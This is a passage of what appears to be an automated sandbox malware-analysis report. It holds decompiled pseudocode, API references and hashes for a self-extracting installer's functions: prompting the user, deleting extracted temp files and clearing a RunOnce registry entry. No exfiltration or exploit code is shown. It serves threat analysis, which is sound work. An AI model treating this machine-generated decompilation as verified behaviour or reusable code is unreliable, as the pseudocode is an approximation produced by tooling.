                                                                                                                                                                                                                                                0x0005409c
                                                                                                                                                                                                                                                0x000540a8
                                                                                                                                                                                                                                                0x000540b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000540c2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000540c2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00054033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00054049
                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 0005405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0005409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000540A8
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000540DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000540E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: cbdb35ef580712d3307cca65b3e4507e8675ad637dcbb609a99d5c681b2c6c1b
                                                                                                                                                                                                                                                • Instruction ID: c925b1d8c378c538314b4cc6a9addfa4462e0e33498ff9556c356ad5e0fc7219
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbdb35ef580712d3307cca65b3e4507e8675ad637dcbb609a99d5c681b2c6c1b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC31C231640718ABFB609B65DC4DFEB77BCEB95706F2002A9FA05D21A1CA344CC9CB65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000551E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000551E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0005468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0005468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E000544B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x59124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x59124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x59124 = 0x80070714;
					goto L10;
				}
				E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x59124 = E00056285();
				goto L10;
			}






                                                                                                                                                                                                                                                0x000551fb
                                                                                                                                                                                                                                                0x00055207
                                                                                                                                                                                                                                                0x0005520b
                                                                                                                                                                                                                                                0x0005523c
                                                                                                                                                                                                                                                0x00055268
                                                                                                                                                                                                                                                0x00055270
                                                                                                                                                                                                                                                0x0005528b
                                                                                                                                                                                                                                                0x00055293
                                                                                                                                                                                                                                                0x0005529c
                                                                                                                                                                                                                                                0x000552a6
                                                                                                                                                                                                                                                0x000552b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000552b0
                                                                                                                                                                                                                                                0x0005529e
                                                                                                                                                                                                                                                0x00055279
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005527b
                                                                                                                                                                                                                                                0x00055273
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055273
                                                                                                                                                                                                                                                0x0005524a
                                                                                                                                                                                                                                                0x00055250
                                                                                                                                                                                                                                                0x00055256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055256
                                                                                                                                                                                                                                                0x00055219
                                                                                                                                                                                                                                                0x00055223
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00052F4D,?,00000002,00000000), ref: 00055201
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00055250
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                • Opcode ID: d3e6bbbfa9a0ec66bff6a4ef36936e77c7100f7fc0a5c6c28e02179c3d7af0f4
                                                                                                                                                                                                                                                • Instruction ID: a8d0a5f964484bdc7e9db1c0f01b74a00e12986de796e1fef5cdd7a602ee3e81
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3e6bbbfa9a0ec66bff6a4ef36936e77c7100f7fc0a5c6c28e02179c3d7af0f4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A211E2B5340701ABE7646BB19C59BBF62DDDB8A397F104029BF02D61D1DA7D8C084629
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000552B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                			E000552B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x58004; // 0x5a679bd9
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x591e0; // 0x26d7100
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x58a24 == 0 &&  *0x59a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x58a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x58a24 == 0 &&  *0x59a30 == 0) {
					_push(_t22);
					E00051781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x59a34 & 0x00000020) != 0) {
						E000565E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00052390( &_v268);
					_t11 =  *0x58a20; // 0x0
				}
				if( *0x59a40 != 1 && _t11 != 0) {
					_t11 = E00051FE1(_t22); // executed
				}
				 *0x58a20 =  *0x58a20 & 0x00000000;
				return E00056CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                                0x000552b6
                                                                                                                                                                                                                                                0x000552b6
                                                                                                                                                                                                                                                0x000552b6
                                                                                                                                                                                                                                                0x000552c1
                                                                                                                                                                                                                                                0x000552c8
                                                                                                                                                                                                                                                0x000552cb
                                                                                                                                                                                                                                                0x000552cc
                                                                                                                                                                                                                                                0x000552d4
                                                                                                                                                                                                                                                0x000552d6
                                                                                                                                                                                                                                                0x000552d7
                                                                                                                                                                                                                                                0x000552de
                                                                                                                                                                                                                                                0x000552e0
                                                                                                                                                                                                                                                0x000552f2
                                                                                                                                                                                                                                                0x000552fa
                                                                                                                                                                                                                                                0x000552fa
                                                                                                                                                                                                                                                0x00055302
                                                                                                                                                                                                                                                0x00055305
                                                                                                                                                                                                                                                0x0005530c
                                                                                                                                                                                                                                                0x00055312
                                                                                                                                                                                                                                                0x00055316
                                                                                                                                                                                                                                                0x00055316
                                                                                                                                                                                                                                                0x00055317
                                                                                                                                                                                                                                                0x0005531c
                                                                                                                                                                                                                                                0x0005531f
                                                                                                                                                                                                                                                0x00055333
                                                                                                                                                                                                                                                0x00055345
                                                                                                                                                                                                                                                0x00055351
                                                                                                                                                                                                                                                0x00055359
                                                                                                                                                                                                                                                0x00055359
                                                                                                                                                                                                                                                0x00055363
                                                                                                                                                                                                                                                0x00055369
                                                                                                                                                                                                                                                0x0005536f
                                                                                                                                                                                                                                                0x00055374
                                                                                                                                                                                                                                                0x00055374
                                                                                                                                                                                                                                                0x00055381
                                                                                                                                                                                                                                                0x00055387
                                                                                                                                                                                                                                                0x00055387
                                                                                                                                                                                                                                                0x0005538f
                                                                                                                                                                                                                                                0x000553a0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(026D7100,00000080,?,00000000), ref: 000552F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(026D7100), ref: 000552FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(026D7100,?,00000000), ref: 00055305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(026D7100), ref: 0005530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(000511FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00055363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00055334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-2312194364
                                                                                                                                                                                                                                                • Opcode ID: 6ce51f1f50b11d5c9cdb0f381e52b438b4aa7e1f05b312978881974b1287a2a1
                                                                                                                                                                                                                                                • Instruction ID: def98ca0d54556d7944280f325426f55348c1c182f343a5f14f26831c93ac3eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce51f1f50b11d5c9cdb0f381e52b438b4aa7e1f05b312978881974b1287a2a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921CF31520B14DBFBA09B20DC19BAB37F4EB04353F040259EC46671A1DBB95E8CCB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00051FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00051FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x58530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                                0x00051fee
                                                                                                                                                                                                                                                0x00052005
                                                                                                                                                                                                                                                0x0005200d
                                                                                                                                                                                                                                                0x00052017
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052020
                                                                                                                                                                                                                                                0x0005200d
                                                                                                                                                                                                                                                0x00052029

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0005538C,?,?,0005538C), ref: 00052005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(0005538C,wextract_cleanup0,?,?,0005538C), ref: 00052017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(0005538C,?,?,0005538C), ref: 00052020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                                • API String ID: 849931509-702805525
                                                                                                                                                                                                                                                • Opcode ID: c3ef6ad4896c4da65a6bf66d40c8a972a0890fe1408a482a93e06eac95b99c43
                                                                                                                                                                                                                                                • Instruction ID: 4c8750cc98c5304c87fe5155abf21f1622065fa5cfe366bb9c2512a0ded4aaac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3ef6ad4896c4da65a6bf66d40c8a972a0890fe1408a482a93e06eac95b99c43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDE04F34661318FBEB218F90EC0EF5B7B69FB02783F101295BE04B00E1EB659A18D705
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00054CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x58004; // 0x5a679bd9
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x591d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00054E99(_t75);
						L35:
						return E00056CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x58584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x591e4;
						_t58 = 0x591e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x591e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x591e4;
						_t30 = E00054702( &_v268, 0x591e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0005476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00054980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E000547E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x593f4 =  *0x593f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x591e4;
						_t63 = 0x591e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x591e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x591e4;
						_t30 = E00054702( &_v268, 0x591e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00054C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00054B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00054B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                                0x00054cd0
                                                                                                                                                                                                                                                0x00054cdb
                                                                                                                                                                                                                                                0x00054ce0
                                                                                                                                                                                                                                                0x00054ce2
                                                                                                                                                                                                                                                0x00054cee
                                                                                                                                                                                                                                                0x00054cf2
                                                                                                                                                                                                                                                0x00054d0e
                                                                                                                                                                                                                                                0x00054d0e
                                                                                                                                                                                                                                                0x00054d11
                                                                                                                                                                                                                                                0x00054e83
                                                                                                                                                                                                                                                0x00054e88
                                                                                                                                                                                                                                                0x00054e98
                                                                                                                                                                                                                                                0x00054e98
                                                                                                                                                                                                                                                0x00054d17
                                                                                                                                                                                                                                                0x00054d17
                                                                                                                                                                                                                                                0x00054d1a
                                                                                                                                                                                                                                                0x00054d2f
                                                                                                                                                                                                                                                0x00054d2f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d2f
                                                                                                                                                                                                                                                0x00054d1c
                                                                                                                                                                                                                                                0x00054d1c
                                                                                                                                                                                                                                                0x00054d1f
                                                                                                                                                                                                                                                0x00054dcb
                                                                                                                                                                                                                                                0x00054dd0
                                                                                                                                                                                                                                                0x00054dd2
                                                                                                                                                                                                                                                0x00054ddd
                                                                                                                                                                                                                                                0x00054ddd
                                                                                                                                                                                                                                                0x00054de3
                                                                                                                                                                                                                                                0x00054de8
                                                                                                                                                                                                                                                0x00054ded
                                                                                                                                                                                                                                                0x00054ded
                                                                                                                                                                                                                                                0x00054def
                                                                                                                                                                                                                                                0x00054df0
                                                                                                                                                                                                                                                0x00054df0
                                                                                                                                                                                                                                                0x00054df4
                                                                                                                                                                                                                                                0x00054df4
                                                                                                                                                                                                                                                0x00054df6
                                                                                                                                                                                                                                                0x00054df9
                                                                                                                                                                                                                                                0x00054dfc
                                                                                                                                                                                                                                                0x00054dfc
                                                                                                                                                                                                                                                0x00054dfe
                                                                                                                                                                                                                                                0x00054dff
                                                                                                                                                                                                                                                0x00054dff
                                                                                                                                                                                                                                                0x00054e03
                                                                                                                                                                                                                                                0x00054e08
                                                                                                                                                                                                                                                0x00054e0a
                                                                                                                                                                                                                                                0x00054e0f
                                                                                                                                                                                                                                                0x00054d03
                                                                                                                                                                                                                                                0x00054d03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d03
                                                                                                                                                                                                                                                0x00054e18
                                                                                                                                                                                                                                                0x00054e20
                                                                                                                                                                                                                                                0x00054e25
                                                                                                                                                                                                                                                0x00054e27
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054e33
                                                                                                                                                                                                                                                0x00054e38
                                                                                                                                                                                                                                                0x00054e3a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054e40
                                                                                                                                                                                                                                                0x00054e51
                                                                                                                                                                                                                                                0x00054e56
                                                                                                                                                                                                                                                0x00054e5b
                                                                                                                                                                                                                                                0x00054e5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054e6a
                                                                                                                                                                                                                                                0x00054e6f
                                                                                                                                                                                                                                                0x00054e71
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054e77
                                                                                                                                                                                                                                                0x00054e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054e7d
                                                                                                                                                                                                                                                0x00054d25
                                                                                                                                                                                                                                                0x00054d25
                                                                                                                                                                                                                                                0x00054d28
                                                                                                                                                                                                                                                0x00054d36
                                                                                                                                                                                                                                                0x00054d3b
                                                                                                                                                                                                                                                0x00054d40
                                                                                                                                                                                                                                                0x00054d40
                                                                                                                                                                                                                                                0x00054d42
                                                                                                                                                                                                                                                0x00054d43
                                                                                                                                                                                                                                                0x00054d43
                                                                                                                                                                                                                                                0x00054d47
                                                                                                                                                                                                                                                0x00054d4a
                                                                                                                                                                                                                                                0x00054d4a
                                                                                                                                                                                                                                                0x00054d4c
                                                                                                                                                                                                                                                0x00054d4f
                                                                                                                                                                                                                                                0x00054d4f
                                                                                                                                                                                                                                                0x00054d51
                                                                                                                                                                                                                                                0x00054d52
                                                                                                                                                                                                                                                0x00054d52
                                                                                                                                                                                                                                                0x00054d56
                                                                                                                                                                                                                                                0x00054d5b
                                                                                                                                                                                                                                                0x00054d5d
                                                                                                                                                                                                                                                0x00054d62
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d67
                                                                                                                                                                                                                                                0x00054d6f
                                                                                                                                                                                                                                                0x00054d74
                                                                                                                                                                                                                                                0x00054d76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d7c
                                                                                                                                                                                                                                                0x00054d84
                                                                                                                                                                                                                                                0x00054d89
                                                                                                                                                                                                                                                0x00054d8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d94
                                                                                                                                                                                                                                                0x00054d99
                                                                                                                                                                                                                                                0x00054d9e
                                                                                                                                                                                                                                                0x00054da1
                                                                                                                                                                                                                                                0x00054daa
                                                                                                                                                                                                                                                0x00054daa
                                                                                                                                                                                                                                                0x00054da3
                                                                                                                                                                                                                                                0x00054da3
                                                                                                                                                                                                                                                0x00054da3
                                                                                                                                                                                                                                                0x00054db5
                                                                                                                                                                                                                                                0x00054dbb
                                                                                                                                                                                                                                                0x00054dbd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054dc3
                                                                                                                                                                                                                                                0x00054dc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054dc5
                                                                                                                                                                                                                                                0x00054dbd
                                                                                                                                                                                                                                                0x00054d2a
                                                                                                                                                                                                                                                0x00054d2a
                                                                                                                                                                                                                                                0x00054d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d2d
                                                                                                                                                                                                                                                0x00054cf8
                                                                                                                                                                                                                                                0x00054cfd
                                                                                                                                                                                                                                                0x00054d02
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00054DB5
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00054DDD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
